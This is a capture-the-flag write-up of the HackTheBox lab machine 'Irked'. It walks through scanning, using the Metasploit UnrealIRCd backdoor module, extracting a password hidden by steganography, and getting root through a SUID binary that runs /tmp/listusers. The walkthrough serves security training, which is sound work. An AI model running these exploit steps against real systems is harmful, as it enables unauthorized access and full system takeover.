Irked – HackTheBox writeup
info card

Exploitation Summary

Initial Exploitation

  • Vulnerability: Backdoor Command Execution of UnrealIRCD
  • Explanation: A malicious backdoor was added to UnrealIRCD version 3.2.8.1

Privilege Escalation

  • Vulnerability: suid executable viewuser
  • Explanation: It can execute as root and is looking for another command to execute in which we can exploit

Enumeration

nmap -p- -A -T4 10.10.10.117
nmap
TCP 22: OpenSSH 6.7p1
TCP 80: Apache 2.4.10
TCP 111: RCP #100000
TCP 6697, 8067, 65534: UnrealIRCd
TCP 48953: RPC #100024

Initial Shell Exploitation

Let’s first check out the website at port 80

website

There’s only an image and a simple text talking about IRC. There’s no other links and no robots.txt. I then run a gobuster scan but does not return any additional webpage of interest.

I then do a quick check on unrealIRCd ports 6697, 8067 and 65534 but do not find any additional information.

unrealIRCd port check

There’s not much else to check so I check to see if there’s any vulnerability in unrealIRCd.

Searchsploit unrealIRCd

searchsploit

There’s a Backdoor Command Execution exploit available in Metasploit for UnrealIRCd version 3.2.8.1. Let’s give it a try.

Metasploit

use exploit/unix/irc/unreal_ircd_3281_backdoor
set rhosts 10.10.10.117
set rport 6697
metasploit setup
exploit
exploit

low shell as ircd obtained

Privilege Escalation – Part 1

Let’s do some poking around the /home folder. User ircd does not have any files of interest. But there’s a file .backup that looks interesting under user djmardov’s Documents folder:

backup file

There seems to be a password. Let’s try to log in as djmardov using the password:

login attempt

Unfortunately, that doesn’t work. Let’s examine the .backup file again. There was a sentence ‘Super elite steg backup pw’. The word steg could potentially mean the password is hidden using some steganography technique.

Recalling there is an unhappy smiley face in the website. Let’s download it and see if any information is hidden in there using command steghide:

steghide

All right! We got another password. Let’s try to ssh into account djmardov:

ssh

That is! We get in as djmardov! And we get the user.txt!

user.txt

Privilege Escalation – Part 2

After poking around the system for a while, I find a file with suid privilege that looks interesting. The below command will look for files with suid privilege that are owned by root:

find / -perm -4000 -user root 2> /dev/null
viewuser

The command viewuser looks interesting. Let’s try to run it:

execute viewuser

It does not result in root account but it shows the the execution looks for a file /tmp/listusers. Let’s copy command dash to it and try again:

root shell obtained

Bingo! root shell obtained. Let’s get our root flag:

root flag

Thank you for the box Irked, MrAgent!

Leave a Reply

Close Menu